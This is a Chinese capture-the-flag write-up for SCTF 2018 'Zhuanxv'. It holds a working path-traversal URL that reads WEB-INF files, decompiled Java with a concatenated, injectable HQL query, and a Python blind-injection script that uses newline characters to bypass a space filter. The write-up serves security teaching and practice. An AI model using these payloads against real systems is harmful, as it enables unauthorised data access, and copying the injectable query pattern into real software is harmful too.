[wp] SCTF 2018 Zhuanxv

扫目录发现/list,点进去发现要登陆,抓包发现一个请求为


看到JSESSIONID,得知是java web,所以想办法读取配置文件web.xml

发现用了struts过滤器,尝试读struts.xml

发现一个看起来和登陆有关的类UserLoginAction,构造payload下载:

http://111.198.29.45:35732/loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class

用JD反编译,截取部分有用的代码:

  public boolean userCheck(User user) {
 List<User> userList = this.userService.loginCheck(user.getName(), user.getPassword());
 if (userList != null && userList.size() == 1) {
   return true;
 }
 addActionError("Username or password is Wrong, please check!");
 return false;
}

但是找不到loginCheck所在的类…于是借鉴了大佬的wp,发现还有个applicationContext.xml
在其中找到类UserServiceImpl:

    public List <User> loginCheck(String name, String password) {
        name = name.replaceAll(" ", "");
        name = name.replaceAll("=", "");
        Matcher username_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(name);
        Matcher password_matcher = Pattern.compile("^[0-9a-zA-Z]+$").matcher(password);
        if (password_matcher.find()) {
            return this.userDao.loginCheck(name, password);
        }
        return null;
    }

是登陆语句的过滤规则,在UserDaoImpl.class中找到:

 public List < User > loginCheck(String name, String password) {
        return getHibernateTemplate().find("from User where name ='" + name + "' and password = '" + password + "'");  
    }

接下来可以写一个盲注脚本,附大佬脚本

https://xz.aliyun.com/t/2405#toc-27

import requests
s=requests.session()

flag=''
for i in range(1,50):
    p=''
    for j in range(1,255):
  		payload="(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'"
  		url="http://111.198.29.45:35732/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1"
  		r1=s.get(url)
  		if len(r1.text)>20000 and p!='':
  			flag+=p
  			print i,flag
  			break
  		p=chr(j)